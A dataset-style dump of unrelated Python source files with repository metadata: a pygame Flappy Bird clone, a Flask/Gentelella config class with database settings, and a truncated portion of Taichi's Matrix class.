assert 123.457 == drawing.rnd(123.4567)
assert 123.456 == drawing.rnd(123.4564)
| 35.549844 | 89 | 0.469804 |
795476df996dd18d4b54f6eabe35efb1ef4fea5f | 15,974 | py | Python | flappy.py | NikhilSharma0409/Flappy-Bird-Using-Python | d3324084f85d9d8442779728f69636ab05170ee5 | [
"MIT"
] | 2 | 2021-08-24T06:49:05.000Z | 2021-08-25T03:01:40.000Z | flappy.py | NikhilSharma0409/Flappy-Bird-Using-Python | d3324084f85d9d8442779728f69636ab05170ee5 | [
"MIT"
] | null | null | null | flappy.py | NikhilSharma0409/Flappy-Bird-Using-Python | d3324084f85d9d8442779728f69636ab05170ee5 | [
"MIT"
] | null | null | null | from itertools import cycle
import random
import sys
import pygame
from pygame.locals import *
FPS = 40
SCREENWIDTH = 288
SCREENHEIGHT = 512
PIPEGAPSIZE = 125 # gap between upper and lower part of pipe
BASEY = SCREENHEIGHT * 0.79
# image, sound and hitmask dicts
IMAGES, SOUNDS, HITMASKS = {}, {}, {}
# list of all possible players (tuple of 3 positions of flap)
PLAYERS_LIST = (
# red bird
(
'redbird-upflap.png',
'redbird-midflap.png',
'redbird-downflap.png',
),
# blue bird
(
'bluebird-upflap.png',
'bluebird-midflap.png',
'bluebird-downflap.png',
),
# yellow bird
(
'yellowbird-upflap.png',
'yellowbird-midflap.png',
'yellowbird-downflap.png',
),
)
# list of backgrounds
BACKGROUNDS_LIST = (
'background-day.png',
'background-night.png',
)
# list of pipes
PIPES_LIST = (
'pipe-green.png',
'pipe-red.png',
)
try:
xrange
except NameError:
xrange = range
def main():
global SCREEN, FPSCLOCK
pygame.init()
FPSCLOCK = pygame.time.Clock()
SCREEN = pygame.display.set_mode((SCREENWIDTH, SCREENHEIGHT))
pygame.display.set_caption('Flappy_Bird_PyCoder15')
# numbers sprites for score display
IMAGES['numbers'] = (
pygame.image.load('0.png').convert_alpha(),
pygame.image.load('1.png').convert_alpha(),
pygame.image.load('2.png').convert_alpha(),
pygame.image.load('3.png').convert_alpha(),
pygame.image.load('4.png').convert_alpha(),
pygame.image.load('5.png').convert_alpha(),
pygame.image.load('6.png').convert_alpha(),
pygame.image.load('7.png').convert_alpha(),
pygame.image.load('8.png').convert_alpha(),
pygame.image.load('9.png').convert_alpha()
)
# game over sprite
IMAGES['gameover'] = pygame.image.load('gameover.png').convert_alpha()
# message sprite for welcome screen
IMAGES['message'] = pygame.image.load('message.png').convert_alpha()
# base (ground) sprite
IMAGES['base'] = pygame.image.load('base.png').convert_alpha()
# sounds
if 'win' in sys.platform:
soundExt = '.wav'
else:
soundExt = '.ogg'
SOUNDS['die'] = pygame.mixer.Sound('die' + soundExt)
SOUNDS['hit'] = pygame.mixer.Sound('hit' + soundExt)
SOUNDS['point'] = pygame.mixer.Sound('point' + soundExt)
SOUNDS['swoosh'] = pygame.mixer.Sound('swoosh' + soundExt)
SOUNDS['wing'] = pygame.mixer.Sound('wing' + soundExt)
while True:
# select random background sprites
randBg = random.randint(0, len(BACKGROUNDS_LIST) - 1)
IMAGES['background'] = pygame.image.load(BACKGROUNDS_LIST[randBg]).convert()
# select random player sprites
randPlayer = random.randint(0, len(PLAYERS_LIST) - 1)
IMAGES['player'] = (
pygame.image.load(PLAYERS_LIST[randPlayer][0]).convert_alpha(),
pygame.image.load(PLAYERS_LIST[randPlayer][1]).convert_alpha(),
pygame.image.load(PLAYERS_LIST[randPlayer][2]).convert_alpha(),
)
# select random pipe sprites
pipeindex = random.randint(0, len(PIPES_LIST) - 1)
IMAGES['pipe'] = (
pygame.transform.flip(
pygame.image.load(PIPES_LIST[pipeindex]).convert_alpha(), False, True),
pygame.image.load(PIPES_LIST[pipeindex]).convert_alpha(),
)
# hismask for pipes
HITMASKS['pipe'] = (
getHitmask(IMAGES['pipe'][0]),
getHitmask(IMAGES['pipe'][1]),
)
# hitmask for player
HITMASKS['player'] = (
getHitmask(IMAGES['player'][0]),
getHitmask(IMAGES['player'][1]),
getHitmask(IMAGES['player'][2]),
)
movementInfo = showWelcomeAnimation()
crashInfo = mainGame(movementInfo)
showGameOverScreen(crashInfo)
def showWelcomeAnimation():
"""Shows welcome screen animation of flappy bird"""
# index of player to blit on screen
playerIndex = 0
playerIndexGen = cycle([0, 1, 2, 1])
# iterator used to change playerIndex after every 5th iteration
loopIter = 0
playerx = int(SCREENWIDTH * 0.2)
playery = int((SCREENHEIGHT - IMAGES['player'][0].get_height()) / 2)
messagex = int((SCREENWIDTH - IMAGES['message'].get_width()) / 2)
messagey = int(SCREENHEIGHT * 0.12)
basex = 0
# amount by which base can maximum shift to left
baseShift = IMAGES['base'].get_width() - IMAGES['background'].get_width()
# player shm for up-down motion on welcome screen
playerShmVals = {'val': 0, 'dir': 1}
while True:
for event in pygame.event.get():
if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
pygame.quit()
sys.exit()
if event.type == KEYDOWN and (event.key == K_SPACE or event.key == K_UP):
# make first flap sound and return values for mainGame
SOUNDS['wing'].play()
return {
'playery': playery + playerShmVals['val'],
'basex': basex,
'playerIndexGen': playerIndexGen,
}
# adjust playery, playerIndex, basex
if (loopIter + 1) % 5 == 0:
playerIndex = next(playerIndexGen)
loopIter = (loopIter + 1) % 30
basex = -((-basex + 4) % baseShift)
playerShm(playerShmVals)
# draw sprites
SCREEN.blit(IMAGES['background'], (0,0))
SCREEN.blit(IMAGES['player'][playerIndex],
(playerx, playery + playerShmVals['val']))
SCREEN.blit(IMAGES['message'], (messagex, messagey))
SCREEN.blit(IMAGES['base'], (basex, BASEY))
pygame.display.update()
FPSCLOCK.tick(FPS)
def mainGame(movementInfo):
score = playerIndex = loopIter = 0
playerIndexGen = movementInfo['playerIndexGen']
playerx, playery = int(SCREENWIDTH * 0.2), movementInfo['playery']
basex = movementInfo['basex']
baseShift = IMAGES['base'].get_width() - IMAGES['background'].get_width()
# get 2 new pipes to add to upperPipes lowerPipes list
newPipe1 = getRandomPipe()
newPipe2 = getRandomPipe()
# list of upper pipes
upperPipes = [
{'x': SCREENWIDTH + 200, 'y': newPipe1[0]['y']},
{'x': SCREENWIDTH + 200 + (SCREENWIDTH / 2), 'y': newPipe2[0]['y']},
]
# list of lowerpipe
lowerPipes = [
{'x': SCREENWIDTH + 200, 'y': newPipe1[1]['y']},
{'x': SCREENWIDTH + 200 + (SCREENWIDTH / 2), 'y': newPipe2[1]['y']},
]
pipeVelX = -4
# player velocity, max velocity, downward accleration, accleration on flap
playerVelY = -9 # player's velocity along Y, default same as playerFlapped
playerMaxVelY = 10 # max vel along Y, max descend speed
playerMinVelY = -8 # min vel along Y, max ascend speed
playerAccY = 1 # players downward accleration
playerRot = 45 # player's rotation
playerVelRot = 3 # angular speed
playerRotThr = 20 # rotation threshold
playerFlapAcc = -9 # players speed on flapping
playerFlapped = False # True when player flaps
while True:
for event in pygame.event.get():
if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
pygame.quit()
sys.exit()
if event.type == KEYDOWN and (event.key == K_SPACE or event.key == K_UP):
if playery > -2 * IMAGES['player'][0].get_height():
playerVelY = playerFlapAcc
playerFlapped = True
SOUNDS['wing'].play()
# check for crash here
crashTest = checkCrash({'x': playerx, 'y': playery, 'index': playerIndex},
upperPipes, lowerPipes)
if crashTest[0]:
return {
'y': playery,
'groundCrash': crashTest[1],
'basex': basex,
'upperPipes': upperPipes,
'lowerPipes': lowerPipes,
'score': score,
'playerVelY': playerVelY,
'playerRot': playerRot
}
# check for score
playerMidPos = playerx + IMAGES['player'][0].get_width() / 2
for pipe in upperPipes:
pipeMidPos = pipe['x'] + IMAGES['pipe'][0].get_width() / 2
if pipeMidPos <= playerMidPos < pipeMidPos + 4:
score += 1
SOUNDS['point'].play()
# playerIndex basex change
if (loopIter + 1) % 3 == 0:
playerIndex = next(playerIndexGen)
loopIter = (loopIter + 1) % 30
basex = -((-basex + 100) % baseShift)
# rotate the player
if playerRot > -90:
playerRot -= playerVelRot
# player's movement
if playerVelY < playerMaxVelY and not playerFlapped:
playerVelY += playerAccY
if playerFlapped:
playerFlapped = False
# more rotation to cover the threshold (calculated in visible rotation)
playerRot = 45
playerHeight = IMAGES['player'][playerIndex].get_height()
playery += min(playerVelY, BASEY - playery - playerHeight)
# move pipes to left
for uPipe, lPipe in zip(upperPipes, lowerPipes):
uPipe['x'] += pipeVelX
lPipe['x'] += pipeVelX
# add new pipe when first pipe is about to touch left of screen
if len(upperPipes) > 0 and 0 < upperPipes[0]['x'] < 5:
newPipe = getRandomPipe()
upperPipes.append(newPipe[0])
lowerPipes.append(newPipe[1])
# remove first pipe if its out of the screen
if len(upperPipes) > 0 and upperPipes[0]['x'] < -IMAGES['pipe'][0].get_width():
upperPipes.pop(0)
lowerPipes.pop(0)
# draw sprites
SCREEN.blit(IMAGES['background'], (0,0))
for uPipe, lPipe in zip(upperPipes, lowerPipes):
SCREEN.blit(IMAGES['pipe'][0], (uPipe['x'], uPipe['y']))
SCREEN.blit(IMAGES['pipe'][1], (lPipe['x'], lPipe['y']))
SCREEN.blit(IMAGES['base'], (basex, BASEY))
# print score so player overlaps the score
showScore(score)
# Player rotation has a threshold
visibleRot = playerRotThr
if playerRot <= playerRotThr:
visibleRot = playerRot
playerSurface = pygame.transform.rotate(IMAGES['player'][playerIndex], visibleRot)
SCREEN.blit(playerSurface, (playerx, playery))
pygame.display.update()
FPSCLOCK.tick(FPS)
def showGameOverScreen(crashInfo):
"""crashes the player down ans shows gameover image"""
score = crashInfo['score']
playerx = SCREENWIDTH * 0.2
playery = crashInfo['y']
playerHeight = IMAGES['player'][0].get_height()
playerVelY = crashInfo['playerVelY']
playerAccY = 2
playerRot = crashInfo['playerRot']
playerVelRot = 7
basex = crashInfo['basex']
upperPipes, lowerPipes = crashInfo['upperPipes'], crashInfo['lowerPipes']
# play hit and die sounds
SOUNDS['hit'].play()
if not crashInfo['groundCrash']:
SOUNDS['die'].play()
while True:
for event in pygame.event.get():
if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
pygame.quit()
sys.exit()
if event.type == KEYDOWN and (event.key == K_SPACE or event.key == K_UP):
if playery + playerHeight >= BASEY - 1:
return
# player y shift
if playery + playerHeight < BASEY - 1:
playery += min(playerVelY, BASEY - playery - playerHeight)
# player velocity change
if playerVelY < 15:
playerVelY += playerAccY
# rotate only when it's a pipe crash
if not crashInfo['groundCrash']:
if playerRot > -90:
playerRot -= playerVelRot
# draw sprites
SCREEN.blit(IMAGES['background'], (0,0))
for uPipe, lPipe in zip(upperPipes, lowerPipes):
SCREEN.blit(IMAGES['pipe'][0], (uPipe['x'], uPipe['y']))
SCREEN.blit(IMAGES['pipe'][1], (lPipe['x'], lPipe['y']))
SCREEN.blit(IMAGES['base'], (basex, BASEY))
showScore(score)
playerSurface = pygame.transform.rotate(IMAGES['player'][1], playerRot)
SCREEN.blit(playerSurface, (playerx,playery))
SCREEN.blit(IMAGES['gameover'], (50, 180))
FPSCLOCK.tick(FPS)
pygame.display.update()
def playerShm(playerShm):
"""oscillates the value of playerShm['val'] between 8 and -8"""
if abs(playerShm['val']) == 8:
playerShm['dir'] *= -1
if playerShm['dir'] == 1:
playerShm['val'] += 1
else:
playerShm['val'] -= 1
def getRandomPipe():
"""returns a randomly generated pipe"""
# y of gap between upper and lower pipe
gapY = random.randrange(0, int(BASEY * 0.6 - PIPEGAPSIZE))
gapY += int(BASEY * 0.2)
pipeHeight = IMAGES['pipe'][0].get_height()
pipeX = SCREENWIDTH + 10
return [
{'x': pipeX, 'y': gapY - pipeHeight}, # upper pipe
{'x': pipeX, 'y': gapY + PIPEGAPSIZE}, # lower pipe
]
def showScore(score):
"""displays score in center of screen"""
scoreDigits = [int(x) for x in list(str(score))]
totalWidth = 0 # total width of all numbers to be printed
for digit in scoreDigits:
totalWidth += IMAGES['numbers'][digit].get_width()
Xoffset = (SCREENWIDTH - totalWidth) / 2
for digit in scoreDigits:
SCREEN.blit(IMAGES['numbers'][digit], (Xoffset, SCREENHEIGHT * 0.1))
Xoffset += IMAGES['numbers'][digit].get_width()
def checkCrash(player, upperPipes, lowerPipes):
"""returns True if player collders with base or pipes."""
pi = player['index']
player['w'] = IMAGES['player'][0].get_width()
player['h'] = IMAGES['player'][0].get_height()
# if player crashes into ground
if player['y'] + player['h'] >= BASEY - 1:
return [True, True]
else:
playerRect = pygame.Rect(player['x'], player['y'],
player['w'], player['h'])
pipeW = IMAGES['pipe'][0].get_width()
pipeH = IMAGES['pipe'][0].get_height()
for uPipe, lPipe in zip(upperPipes, lowerPipes):
# upper and lower pipe rects
uPipeRect = pygame.Rect(uPipe['x'], uPipe['y'], pipeW, pipeH)
lPipeRect = pygame.Rect(lPipe['x'], lPipe['y'], pipeW, pipeH)
# player and upper/lower pipe hitmasks
pHitMask = HITMASKS['player'][pi]
uHitmask = HITMASKS['pipe'][0]
lHitmask = HITMASKS['pipe'][1]
# if bird collided with upipe or lpipe
uCollide = pixelCollision(playerRect, uPipeRect, pHitMask, uHitmask)
lCollide = pixelCollision(playerRect, lPipeRect, pHitMask, lHitmask)
if uCollide or lCollide:
return [True, False]
return [False, False]
def pixelCollision(rect1, rect2, hitmask1, hitmask2):
"""Checks if two objects collide and not just their rects"""
rect = rect1.clip(rect2)
if rect.width == 0 or rect.height == 0:
return False
x1, y1 = rect.x - rect1.x, rect.y - rect1.y
x2, y2 = rect.x - rect2.x, rect.y - rect2.y
for x in xrange(rect.width):
for y in xrange(rect.height):
if hitmask1[x1+x][y1+y] and hitmask2[x2+x][y2+y]:
return True
return False
def getHitmask(image):
"""returns a hitmask using an image's alpha."""
mask = []
for x in xrange(image.get_width()):
mask.append([])
for y in xrange(image.get_height()):
mask[x].append(bool(image.get_at((x,y))[3]))
return mask
if __name__ == '__main__':
main()
| 32.733607 | 90 | 0.582321 |
7954771e56a748db05a1e9b4e24e853058898f51 | 983 | py | Python | config.py | rougeo/flask-gentelella | b8d8c39fdb45472d68e69502155fb06cdb0d6c61 | [
"MIT"
] | null | null | null | config.py | rougeo/flask-gentelella | b8d8c39fdb45472d68e69502155fb06cdb0d6c61 | [
"MIT"
] | null | null | null | config.py | rougeo/flask-gentelella | b8d8c39fdb45472d68e69502155fb06cdb0d6c61 | [
"MIT"
] | null | null | null | from os import environ
class Config(object):
SECRET_KEY = 'key'
SQLALCHEMY_DATABASE_URI = 'sqlite:///database.db'
SQLALCHEMY_TRACK_MODIFICATIONS = False
# THEME SUPPORT
# if set then url_for('static', filename='', theme='')
# will add the theme name to the static URL:
# /static/<DEFAULT_THEME>/filename
# DEFAULT_THEME = "themes/dark"
DEFAULT_THEME = None
class ProductionConfig(Config):
DEBUG = False
# PostgreSQL database
SQLALCHEMY_DATABASE_URI = 'postgresql://{}:{}@{}:{}/{}'.format(
environ.get('GENTELELLA_DATABASE_USER', 'gentelella'),
environ.get('GENTELELLA_DATABASE_PASSWORD', 'gentelella'),
environ.get('GENTELELLA_DATABASE_HOST', 'db'),
environ.get('GENTELELLA_DATABASE_PORT', 5432),
environ.get('GENTELELLA_DATABASE_NAME', 'gentelella')
)
class DebugConfig(Config):
DEBUG = True
config_dict = {
'Production': ProductionConfig,
'Debug': DebugConfig
}
| 25.868421 | 67 | 0.669379 |
795478c4a9a2fbd2f6ce3883119af5d0c804f58d | 34,782 | py | Python | python/taichi/lang/matrix.py | arisliang/taichi | c775649705195a84e17a04432b60e796f31dee5c | [
"MIT"
] | null | null | null | python/taichi/lang/matrix.py | arisliang/taichi | c775649705195a84e17a04432b60e796f31dee5c | [
"MIT"
] | null | null | null | python/taichi/lang/matrix.py | arisliang/taichi | c775649705195a84e17a04432b60e796f31dee5c | [
"MIT"
] | null | null | null | import copy
import numbers
from collections.abc import Iterable
import numpy as np
from taichi.lang import expr, impl
from taichi.lang import ops as ops_mod
from taichi.lang import kernel_impl as kern_mod
from taichi.lang.common_ops import TaichiOperations
from taichi.lang.exception import TaichiSyntaxError
from taichi.lang.util import (in_python_scope, is_taichi_class, python_scope,
taichi_scope, to_numpy_type, to_pytorch_type)
from taichi.misc.util import deprecated, warning
class Matrix(TaichiOperations):
is_taichi_class = True
# TODO(archibate): move the last two line to **kwargs,
# since they're not commonly used as positional args.
def __init__(self,
n=1,
m=1,
dt=None,
shape=None,
offset=None,
empty=False,
layout=None,
needs_grad=False,
keep_raw=False,
rows=None,
cols=None):
self.grad = None
# construct from rows or cols (deprecated)
if rows is not None or cols is not None:
warning(
f"ti.Matrix(rows=[...]) or ti.Matrix(cols=[...]) is deprecated, use ti.Matrix.rows([...]) or ti.Matrix.cols([...]) instead.",
DeprecationWarning,
stacklevel=2)
if rows is not None and cols is not None:
raise Exception("cannot specify both rows and columns")
self.dt = dt
mat = Matrix.cols(cols) if cols is not None else Matrix.rows(rows)
self.n = mat.n
self.m = mat.m
self.entries = mat.entries
return
elif empty == True:
warning(
f"ti.Matrix(n, m, empty=True) is deprecated, use ti.Matrix.empty(n, m) instead",
DeprecationWarning,
stacklevel=2)
self.dt = dt
self.entries = [[None] * m for _ in range(n)]
return
elif isinstance(n, (list, tuple, np.ndarray)):
if len(n) == 0:
mat = []
elif isinstance(n[0], Matrix):
raise Exception(
'cols/rows required when using list of vectors')
elif not isinstance(n[0], Iterable):
if impl.inside_kernel():
# wrap potential constants with Expr
if keep_raw:
mat = [list([x]) for x in n]
else:
mat = [list([expr.Expr(x)]) for x in n]
else:
mat = [[x] for x in n]
else:
mat = [list(r) for r in n]
self.n = len(mat)
if len(mat) > 0:
self.m = len(mat[0])
else:
self.m = 1
self.entries = [x for row in mat for x in row]
else:
if dt is None:
# create a local matrix with specific (n, m)
self.entries = [impl.expr_init(None) for i in range(n * m)]
self.n = n
self.m = m
else:
# construct global matrix (deprecated)
warning(
"Declaring global matrices using `ti.Matrix(n, m, dt, shape)` is deprecated, "
"use `ti.Matrix.field(n, m, dtype, shape)` instead",
DeprecationWarning,
stacklevel=2)
mat = Matrix.field(n=n,
m=m,
dtype=dt,
shape=shape,
offset=offset,
needs_grad=needs_grad,
layout=layout)
self.n = mat.n
self.m = mat.m
self.entries = mat.entries
self.grad = mat.grad
if self.n * self.m > 32:
warning(
f'Taichi matrices/vectors with {self.n}x{self.m} > 32 entries are not suggested.'
' Matrices/vectors will be automatically unrolled at compile-time for performance.'
' So the compilation time could be extremely long if the matrix size is too big.'
' You may use a field to store a large matrix like this, e.g.:\n'
f' x = ti.field(ti.f32, ({self.n}, {self.m})).\n'
' See https://taichi.readthedocs.io/en/stable/tensor_matrix.html#matrix-size'
' for more details.',
UserWarning,
stacklevel=2)
def is_global(self):
results = [False for _ in self.entries]
for i, e in enumerate(self.entries):
if isinstance(e, expr.Expr):
if e.is_global():
results[i] = True
assert results[i] == results[0], \
"Matrices with mixed global/local entries are not allowed"
return results[0]
def element_wise_binary(self, foo, other):
_taichi_skip_traceback = 1
ret = self.empty_copy()
if isinstance(other, (list, tuple)):
other = Matrix(other)
if isinstance(other, Matrix):
assert self.m == other.m and self.n == other.n, f"Dimension mismatch between shapes ({self.n}, {self.m}), ({other.n}, {other.m})"
for i in range(self.n * self.m):
ret.entries[i] = foo(self.entries[i], other.entries[i])
else: # assumed to be scalar
for i in range(self.n * self.m):
ret.entries[i] = foo(self.entries[i], other)
return ret
def broadcast_copy(self, other):
if isinstance(other, (list, tuple)):
other = Matrix(other)
if not isinstance(other, Matrix):
ret = self.empty_copy()
ret.entries = [other for _ in ret.entries]
other = ret
assert self.m == other.m and self.n == other.n, f"Dimension mismatch between shapes ({self.n}, {self.m}), ({other.n}, {other.m})"
return other
def element_wise_ternary(self, foo, other, extra):
ret = self.empty_copy()
other = self.broadcast_copy(other)
extra = self.broadcast_copy(extra)
for i in range(self.n * self.m):
ret.entries[i] = foo(self.entries[i], other.entries[i],
extra.entries[i])
return ret
def element_wise_writeback_binary(self, foo, other):
ret = self.empty_copy()
if isinstance(other, (list, tuple)):
other = Matrix(other)
if is_taichi_class(other):
other = other.variable()
if foo.__name__ == 'assign' and not isinstance(other, Matrix):
raise TaichiSyntaxError(
'cannot assign scalar expr to '
f'taichi class {type(self)}, maybe you want to use `a.fill(b)` instead?'
)
if isinstance(other, Matrix):
assert self.m == other.m and self.n == other.n, f"Dimension mismatch between shapes ({self.n}, {self.m}), ({other.n}, {other.m})"
for i in range(self.n * self.m):
ret.entries[i] = foo(self.entries[i], other.entries[i])
else: # assumed to be scalar
for i in range(self.n * self.m):
ret.entries[i] = foo(self.entries[i], other)
return ret
def element_wise_unary(self, foo):
_taichi_skip_traceback = 1
ret = self.empty_copy()
for i in range(self.n * self.m):
ret.entries[i] = foo(self.entries[i])
return ret
def __matmul__(self, other):
_taichi_skip_traceback = 1
assert isinstance(other, Matrix), "rhs of `@` is not a matrix / vector"
assert self.m == other.n, f"Dimension mismatch between shapes ({self.n}, {self.m}), ({other.n}, {other.m})"
del _taichi_skip_traceback
ret = Matrix.new(self.n, other.m)
for i in range(self.n):
for j in range(other.m):
acc = self(i, 0) * other(0, j)
for k in range(1, other.n):
acc = acc + self(i, k) * other(k, j)
ret.set_entry(i, j, acc)
return ret
def linearize_entry_id(self, *args):
assert 1 <= len(args) <= 2
if len(args) == 1 and isinstance(args[0], (list, tuple)):
args = args[0]
if len(args) == 1:
args = args + (0, )
_taichi_skip_traceback = 1
# TODO(#1004): See if it's possible to support indexing at runtime
for i, a in enumerate(args):
if not isinstance(a, int):
raise TaichiSyntaxError(
f'The {i}-th index of a Matrix/Vector must be a compile-time constant '
f'integer, got {type(a)}.\n'
'This is because matrix operations will be **unrolled** at compile-time '
'for performance reason.\n'
'If you want to *iterate through matrix elements*, use a static range:\n'
' for i in ti.static(range(3)):\n'
' print(i, "-th component is", vec[i])\n'
'See https://taichi.readthedocs.io/en/stable/meta.html#when-to-use-for-loops-with-ti-static for more details.'
)
assert 0 <= args[0] < self.n, \
f"The 0-th matrix index is out of range: 0 <= {args[0]} < {self.n}"
assert 0 <= args[1] < self.m, \
f"The 1-th matrix index is out of range: 0 <= {args[1]} < {self.m}"
return args[0] * self.m + args[1]
def __call__(self, *args, **kwargs):
_taichi_skip_traceback = 1
assert kwargs == {}
return self.entries[self.linearize_entry_id(*args)]
def get_field_members(self):
return self.entries
@deprecated('x.get_tensor_members()', 'x.get_field_members()')
def get_tensor_members(self):
return self.get_field_members()
def get_entry(self, *args, **kwargs):
assert kwargs == {}
return self.entries[self.linearize_entry_id(*args)]
def set_entry(self, i, j, e):
idx = self.linearize_entry_id(i, j)
if impl.inside_kernel():
self.entries[idx].assign(e)
else:
self.entries[idx] = e
def place(self, snode):
for e in self.entries:
snode.place(e)
@taichi_scope
def subscript(self, *indices):
_taichi_skip_traceback = 1
if self.is_global():
ret = self.empty_copy()
for i, e in enumerate(self.entries):
ret.entries[i] = impl.subscript(e, *indices)
return ret
else:
assert len(indices) in [1, 2]
i = indices[0]
j = 0 if len(indices) == 1 else indices[1]
return self(i, j)
@property
def x(self):
_taichi_skip_traceback = 1
if impl.inside_kernel():
return self.subscript(0)
else:
return self[0]
@property
def y(self):
_taichi_skip_traceback = 1
if impl.inside_kernel():
return self.subscript(1)
else:
return self[1]
@property
def z(self):
_taichi_skip_traceback = 1
if impl.inside_kernel():
return self.subscript(2)
else:
return self[2]
@property
def w(self):
_taichi_skip_traceback = 1
if impl.inside_kernel():
return self.subscript(3)
else:
return self[3]
# since Taichi-scope use v.x.assign() instead
@x.setter
@python_scope
def x(self, value):
_taichi_skip_traceback = 1
self[0] = value
@y.setter
@python_scope
def y(self, value):
_taichi_skip_traceback = 1
self[1] = value
@z.setter
@python_scope
def z(self, value):
_taichi_skip_traceback = 1
self[2] = value
@w.setter
@python_scope
def w(self, value):
_taichi_skip_traceback = 1
self[3] = value
class Proxy:
def __init__(self, mat, index):
"""Proxy when a tensor of Matrices is accessed by host."""
self.mat = mat
self.index = index
@python_scope
def __getitem__(self, item):
if not isinstance(item, (list, tuple)):
item = [item]
return self.mat(*item)[self.index]
@python_scope
def __setitem__(self, key, value):
if not isinstance(key, (list, tuple)):
key = [key]
self.mat(*key)[self.index] = value
@property
def x(self):
return self[0]
@property
def y(self):
return self[1]
@property
def z(self):
return self[2]
@property
def w(self):
return self[3]
@x.setter
def x(self, value):
self[0] = value
@y.setter
def y(self, value):
self[1] = value
@z.setter
def z(self, value):
self[2] = value
@w.setter
def w(self, value):
self[3] = value
@property
def value(self):
ret = self.mat.empty_copy()
for i in range(self.mat.n):
for j in range(self.mat.m):
ret.entries[i * self.mat.m + j] = self.mat(i,
j)[self.index]
return ret
# host access & python scope operation
@python_scope
def __getitem__(self, indices):
if self.is_global():
return Matrix.Proxy(self, indices)
if not isinstance(indices, (list, tuple)):
indices = [indices]
assert len(indices) in [1, 2]
i = indices[0]
j = 0 if len(indices) == 1 else indices[1]
return self(i, j)
@python_scope
def __setitem__(self, indices, item):
if self.is_global():
if not isinstance(item, (list, tuple)):
item = list(item)
if not isinstance(item[0], (list, tuple)):
item = [[i] for i in item]
for i in range(self.n):
for j in range(self.m):
self(i, j)[indices] = item[i][j]
return
if not isinstance(indices, (list, tuple)):
indices = [indices]
assert len(indices) in [1, 2]
i = indices[0]
j = 0 if len(indices) == 1 else indices[1]
self.set_entry(i, j, item)
def __len__(self):
return self.n
def __iter__(self):
if self.m == 1:
return (self(i) for i in range(self.n))
else:
return ([self(i, j) for j in range(self.m)] for i in range(self.n))
def empty_copy(self):
return Matrix.empty(self.n, self.m)
def copy(self):
ret = self.empty_copy()
ret.entries = copy.copy(self.entries)
return ret
@taichi_scope
def variable(self):
ret = self.copy()
ret.entries = [impl.expr_init(e) for e in ret.entries]
return ret
@taichi_scope
def cast(self, dtype):
_taichi_skip_traceback = 1
ret = self.copy()
for i in range(len(self.entries)):
ret.entries[i] = ops_mod.cast(ret.entries[i], dtype)
return ret
def trace(self):
assert self.n == self.m
sum = self(0, 0)
for i in range(1, self.n):
sum = sum + self(i, i)
return sum
@taichi_scope
def inverse(self):
assert self.n == self.m, 'Only square matrices are invertible'
if self.n == 1:
return Matrix([1 / self(0, 0)])
elif self.n == 2:
inv_det = impl.expr_init(1.0 / self.determinant())
# Discussion: https://github.com/taichi-dev/taichi/pull/943#issuecomment-626344323
return inv_det * Matrix([[self(1, 1), -self(0, 1)],
[-self(1, 0), self(0, 0)]]).variable()
elif self.n == 3:
n = 3
import taichi as ti
inv_determinant = ti.expr_init(1.0 / self.determinant())
entries = [[0] * n for _ in range(n)]
def E(x, y):
return self(x % n, y % n)
for i in range(n):
for j in range(n):
entries[j][i] = ti.expr_init(
inv_determinant * (E(i + 1, j + 1) * E(i + 2, j + 2) -
E(i + 2, j + 1) * E(i + 1, j + 2)))
return Matrix(entries)
elif self.n == 4:
n = 4
import taichi as ti
inv_determinant = ti.expr_init(1.0 / self.determinant())
entries = [[0] * n for _ in range(n)]
def E(x, y):
return self(x % n, y % n)
for i in range(n):
for j in range(n):
entries[j][i] = ti.expr_init(
inv_determinant * (-1)**(i + j) *
((E(i + 1, j + 1) *
(E(i + 2, j + 2) * E(i + 3, j + 3) -
E(i + 3, j + 2) * E(i + 2, j + 3)) -
E(i + 2, j + 1) *
(E(i + 1, j + 2) * E(i + 3, j + 3) -
E(i + 3, j + 2) * E(i + 1, j + 3)) +
E(i + 3, j + 1) *
(E(i + 1, j + 2) * E(i + 2, j + 3) -
E(i + 2, j + 2) * E(i + 1, j + 3)))))
return Matrix(entries)
else:
raise Exception(
"Inversions of matrices with sizes >= 5 are not supported")
inversed = deprecated('a.inversed()', 'a.inverse()')(inverse)
@kern_mod.pyfunc
def normalized(self, eps=0):
impl.static(
impl.static_assert(self.m == 1,
"normalized() only works on vector"))
invlen = 1 / (self.norm() + eps)
return invlen * self
@staticmethod
@deprecated('ti.Matrix.transposed(a)', 'a.transpose()')
def transposed(a):
return a.transpose()
@deprecated('a.T()', 'a.transpose()')
def T(self):
return self.transpose()
@kern_mod.pyfunc
def transpose(self):
ret = Matrix([[self[i, j] for i in range(self.n)]
for j in range(self.m)])
return ret
@taichi_scope
def determinant(a):
if a.n == 2 and a.m == 2:
return a(0, 0) * a(1, 1) - a(0, 1) * a(1, 0)
elif a.n == 3 and a.m == 3:
return a(0, 0) * (a(1, 1) * a(2, 2) - a(2, 1) * a(1, 2)) - a(
1, 0) * (a(0, 1) * a(2, 2) - a(2, 1) * a(0, 2)) + a(
2, 0) * (a(0, 1) * a(1, 2) - a(1, 1) * a(0, 2))
elif a.n == 4 and a.m == 4:
import taichi as ti
n = 4
def E(x, y):
return a(x % n, y % n)
det = ti.expr_init(0.0)
for i in range(4):
det = det + (-1.0)**i * (
a(i, 0) *
(E(i + 1, 1) *
(E(i + 2, 2) * E(i + 3, 3) - E(i + 3, 2) * E(i + 2, 3)) -
E(i + 2, 1) *
(E(i + 1, 2) * E(i + 3, 3) - E(i + 3, 2) * E(i + 1, 3)) +
E(i + 3, 1) *
(E(i + 1, 2) * E(i + 2, 3) - E(i + 2, 2) * E(i + 1, 3))))
return det
else:
raise Exception(
"Determinants of matrices with sizes >= 5 are not supported")
@staticmethod
def diag(dim, val):
ret = Matrix(dim, dim)
for i in range(dim):
for j in range(dim):
if i == j:
ret.set_entry(i, j, val)
else:
ret.set_entry(i, j, 0 * val)
# TODO: need a more systematic way to create a "0" with the right type
return ret
def loop_range(self):
return self.entries[0]
@property
def shape(self):
# Took `self.entries[0]` as a representation of this tensor-of-matrices.
# https://github.com/taichi-dev/taichi/issues/1069#issuecomment-635712140
return self.loop_range().shape
@deprecated('x.dim()', 'len(x.shape)')
def dim(self):
return len(self.shape)
@property
def dtype(self):
return self.loop_range().dtype
@deprecated('x.data_type()', 'x.dtype')
def data_type(self):
return self.dtype
@property
def snode(self):
return self.loop_range().snode
def make_grad(self):
